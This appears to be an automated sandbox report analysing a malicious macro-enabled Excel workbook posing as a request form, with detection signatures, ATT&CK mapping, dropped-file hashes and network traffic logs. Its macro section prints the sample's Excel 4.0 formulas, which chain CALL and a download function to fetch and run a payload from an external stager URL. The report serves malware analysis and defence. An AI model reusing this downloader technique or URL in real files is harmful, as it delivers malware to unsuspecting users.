Analysis Report request_form_1611306935.xlsm
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Compliance: |
---|
Uses new MSVCR Dlls |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (creates forbidden files) |
Source: | File created: |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: |
Source: | File read: |
Source: | Window detected: |
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Replication Through Removable Media1 | Scripting11 | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | Peripheral Device Discovery11 | Replication Through Removable Media1 | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting11 | Security Account Manager | System Information Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 9% | ReversingLabs | Document-Excel.Trojan.Heuristic | |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 0% | URL Reputation | safe | |
| 0% | Avira URL Cloud | safe | |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
jvdattorney.com | 162.241.225.18 | true | false | | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| false | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | high |
| | false | | unknown |
Contacted IPs |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 343133 |
Start date: | 22.01.2021 |
Start time: | 11:45:45 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 16s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | request_form_1611306935.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of new started processes analysed: | 23 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal64.expl.evad.winXLSM@2/12@1/2 |
Cookbook Comments: |
Warnings: |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
UNIFIEDLAYER-AS-1US | | | malicious | | |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 132942 |
Entropy (8bit): | 5.372898345467023 |
Encrypted: | false |
SSDEEP: | 1536:wcQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:WrQ9DQW+zBX8P |
MD5: | 9E81AE6834204F1603D85DB0F2715445 |
SHA1: | 0AAFB5D472B443DFF15C924BB333D312FE8DA476 |
SHA-256: | 882A40C2C8A9835D2BA318020A8DFFAB7A5970CFB8457CB9D0BE9C18C58F01B8 |
SHA-512: | 0A76B9FD31BEBA4C0B1620C32BED2A5F8D4A2E1FC9A4015131874BEB6D0A2D57E7BBBE716FA1CB724E59A24AE919B0EBE06BB09BF16BF32F07CBBA6CE0CF211C |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 16999 |
Entropy (8bit): | 7.245623688499512 |
Encrypted: | false |
SSDEEP: | 192:LYUGo7Hs+KmIqbuGwTLHd8TS9/P2iponEKUAVi+mEqM6AH2HyFUt:LY/ks/hTLHdV9uiMEKk+RqNueh |
MD5: | 17A33B944AE3D430755B936573D29D81 |
SHA1: | 4F857FFA6B96040D1A599282395C9B235CED47D2 |
SHA-256: | EABF400B7FFF9E0E3826E21CE1B6C0B27A2AA691433828D4929DB86BAD2B5D95 |
SHA-512: | 8E6B06B37D1847FFCCD55057B136A2C0DA6C03FE58B62BAB0A9BBCFF4DC89A09AE2399488C8FDDBA907D24260227BA3DD8921547C54EB9C7D11CB308E8192FFC |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.649128754247888 |
Encrypted: | false |
SSDEEP: | 12:8NCXUkpuElPCH2A5PbMpn0Q+WrjAZ/2bD0lTLC5Lu4t2Y+xIBjKZm:8NbFbMWqAZiDZ87aB6m |
MD5: | 05AD3606B833EAA097DF939096EE6EA0 |
SHA1: | A5EFA39CD586BF3659178FAEF3EC042199E71967 |
SHA-256: | 6685163881E61FFAB7DEDF34436D05DCA15E3C1187706627ED027F12084F729B |
SHA-512: | 61AC7C66C306C4630C5AC1DF27AF32D9B6984A2695351496F96FCE666E170096B2665D1401B9E568554CD57F3574E796CD9523890119D56A00A69C392002AD05 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | modified |
Size (bytes): | 299 |
Entropy (8bit): | 4.757013773544315 |
Encrypted: | false |
SSDEEP: | 6:djYOWJcWapmHWJcWapmOWJcWapmHWJcWapmOWJcWapmHWJcWapmOWJcWapc:dMOWlapmHWlapmOWlapmHWlapmOWlap5 |
MD5: | 3C08FBB167AAFDACB0B5E3B1F6A3D53A |
SHA1: | C8FCEE10CE6CF142E9D8974C414CA8E6573F193A |
SHA-256: | 9BEA52E05C051EF5969E66129F5F2E0D2641E85F12BC502BF266B409471C000B |
SHA-512: | 617CE063F07333C514EB4A3109F0283D23C5115AFCF6315D24DB67949937606AA6119E4D851098BFDEF551F39DFFE7F9A4986905FF6BD81750C07939DC82C0EB |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 4500 |
Entropy (8bit): | 4.702877924238364 |
Encrypted: | false |
SSDEEP: | 48:84vZ6Dwko6spB6p4vZ6Dwko6spB6pavZ6Dwko6spB6pavZ6Dwko6spB6:8BHspKBHspKTHspKTHsp |
MD5: | A9A64A3AB585A26CD43F18B24CCDF015 |
SHA1: | 4B3E85A65E716D45C9686C7A8D70F2AFDB515E78 |
SHA-256: | A57711BB2548B645E1EBD353E09FB76227117ED79D5170E9C254C18A61D2AE3F |
SHA-512: | 64E645F1A498B10DEF3CBD450AA66DAF0344115D521E33DB6F47F183F0DEB3FE9AA5EA6EE7FDF084706D9173B46CEAFE6B59AE18538D13FD1A0F64FB6EE60485 |
Malicious: | true |
Reputation: | low |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 16999 |
Entropy (8bit): | 7.245623688499512 |
Encrypted: | false |
SSDEEP: | 192:LYUGo7Hs+KmIqbuGwTLHd8TS9/P2iponEKUAVi+mEqM6AH2HyFUt:LY/ks/hTLHdV9uiMEKk+RqNueh |
MD5: | 17A33B944AE3D430755B936573D29D81 |
SHA1: | 4F857FFA6B96040D1A599282395C9B235CED47D2 |
SHA-256: | EABF400B7FFF9E0E3826E21CE1B6C0B27A2AA691433828D4929DB86BAD2B5D95 |
SHA-512: | 8E6B06B37D1847FFCCD55057B136A2C0DA6C03FE58B62BAB0A9BBCFF4DC89A09AE2399488C8FDDBA907D24260227BA3DD8921547C54EB9C7D11CB308E8192FFC |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 495 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtBhFXI6dtt:RJZhJZhJ1 |
MD5: | 28C0C942161F749E335A76E714AACA29 |
SHA1: | 53D07F227E4A2F3AF5373958409A19DE1FA1CF9C |
SHA-256: | BA0AB47EA8285A45E0884C5916C7C3052BE3C5245A0FC350DF4E83B91BC2A3F5 |
SHA-512: | 075F04CF77A30D166E9C04A6376629508A854F9218CEA194EC1D69A65669C51F3A0858697F258AF0DF5954DE02C7EEF2D060B6F69D8194D4D4A95D2C94900DAE |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 0 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | D41D8CD98F00B204E9800998ECF8427E |
SHA1: | DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 |
SHA-256: | E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 |
SHA-512: | CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E |
Malicious: | false |
Reputation: | high, very likely benign file |
Static File Info |
---|
General | |
---|---|
Entropy (8bit): | 7.245499147058293 |
File name: | request_form_1611306935.xlsm |
File size: | 17127 |
MD5: | 5fd958006a94c6145364c06bbf264d06 |
SHA1: | d5cc7dc1083508dbe5531db67a3f78866e00330c |
SHA256: | f41c4588d2ef8936d9417069a1c5a44833fb2994c60c54bda14b1aac9aa7b83a |
SHA512: | a8c80661725284a629ec45f25331ea1349f63f4ea8245ae6c6fb62b9e3ac6114889c6b909c34332acd403ac7f0448a1692165b888aa8f7c4fa0ef8fbb404c0d9 |
SSDEEP: | 384:rNUK4o2aGcnzJTABwiMEx4o9QC32XRRl4Y:JUpaGcPiML8QC32blP |
File Content Preview: | PK..........!.................[Content_Types].xml ...(...............!!........................................................................................................................................................................................ |
File Icon |
---|
Icon Hash: | 74ecd0e2f696908c |
Static OLE Info |
---|
General | |
---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "request_form_1611306935.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA15&'Doc2'!AA16,'Doc2'!AB15&'Doc2'!AB16&'Doc2'!AB17,""JCJ"",'Doc2'!AD15,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA19&'Doc2'!AA20,'Doc2'!AB19&'Doc2'!AB20&'Doc2'!AB21,""JCJ"",'Doc2'!AD15&'Doc2'!AD19,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA23&'Doc2'!AA24,'Doc2'!AB23&'Doc2'!AB24&'Doc2'!AB25,""JJCCJJ"",0,A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""INSENG"",""DownloadFile"",""BCCJ"",A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,1)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA27&'Doc2'!AA28,'Doc2'!AB27&'Doc2'!AB28&'Doc2'!AB29,""JJCCCCJJ"",0,'Doc2'!AD27,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(Q1),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,http://jvdattorney.com/stager/babmboa.php,,,,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 22, 2021 11:46:43.850178957 CET | 49716 | 80 | 192.168.2.3 | 162.241.225.18 |
Jan 22, 2021 11:46:44.018779039 CET | 80 | 49716 | 162.241.225.18 | 192.168.2.3 |
Jan 22, 2021 11:46:44.018928051 CET | 49716 | 80 | 192.168.2.3 | 162.241.225.18 |
Jan 22, 2021 11:46:44.020159960 CET | 49716 | 80 | 192.168.2.3 | 162.241.225.18 |
Jan 22, 2021 11:46:44.188584089 CET | 80 | 49716 | 162.241.225.18 | 192.168.2.3 |
Jan 22, 2021 11:46:44.451824903 CET | 80 | 49716 | 162.241.225.18 | 192.168.2.3 |
Jan 22, 2021 11:46:44.452049971 CET | 49716 | 80 | 192.168.2.3 | 162.241.225.18 |
Jan 22, 2021 11:46:44.491180897 CET | 49716 | 80 | 192.168.2.3 | 162.241.225.18 |
Jan 22, 2021 11:46:44.659750938 CET | 80 | 49716 | 162.241.225.18 | 192.168.2.3 |
Jan 22, 2021 11:46:44.969109058 CET | 80 | 49716 | 162.241.225.18 | 192.168.2.3 |
Jan 22, 2021 11:46:44.969269991 CET | 49716 | 80 | 192.168.2.3 | 162.241.225.18 |
Jan 22, 2021 11:46:49.969836950 CET | 80 | 49716 | 162.241.225.18 | 192.168.2.3 |
Jan 22, 2021 11:46:49.969914913 CET | 49716 | 80 | 192.168.2.3 | 162.241.225.18 |
Jan 22, 2021 11:47:19.969835043 CET | 80 | 49716 | 162.241.225.18 | 192.168.2.3 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 22, 2021 11:46:29.357741117 CET | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:30.250514030 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:30.298774958 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:31.352744102 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:31.409552097 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:32.573880911 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:32.624667883 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:33.970380068 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:34.021138906 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:39.761533022 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:39.825978041 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:40.712891102 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:40.760795116 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:41.132091999 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:41.191463947 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:42.138147116 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:42.197272062 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:43.152982950 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:43.217340946 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:43.706247091 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:43.848256111 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:43.938977003 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:43.986840010 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:45.145550013 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:45.165976048 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:45.193463087 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:45.224885941 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:46.391350031 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:46.439323902 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:47.502361059 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:47.558892965 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:48.693598032 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:48.741473913 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:49.181998968 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:49.241058111 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:50.143279076 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:50.191530943 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:51.619292021 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:51.683568954 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:57.840711117 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:57.888685942 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:47:02.693780899 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:47:02.751976013 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:47:08.629539013 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:47:08.687330008 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:47:18.617120028 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:47:18.687684059 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:47:34.433465958 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:47:34.484159946 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:47:37.654282093 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:47:37.715204954 CET | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:48:09.310009003 CET | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:48:09.358670950 CET | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:48:10.839138031 CET | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:48:10.907335043 CET | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 22, 2021 11:46:43.706247091 CET | 192.168.2.3 | 8.8.8.8 | 0x2a84 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 22, 2021 11:46:43.848256111 CET | 8.8.8.8 | 192.168.2.3 | 0x2a84 | No error (0) | 162.241.225.18 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49716 | 162.241.225.18 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 22, 2021 11:46:44.020159960 CET | 108 | OUT | |
Jan 22, 2021 11:46:44.451824903 CET | 113 | IN | |
Jan 22, 2021 11:46:44.491180897 CET | 113 | OUT | |
Jan 22, 2021 11:46:44.969109058 CET | 120 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
System Behavior |
---|
General |
---|
Start time: | 11:46:39 |
Start date: | 22/01/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x3a0000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|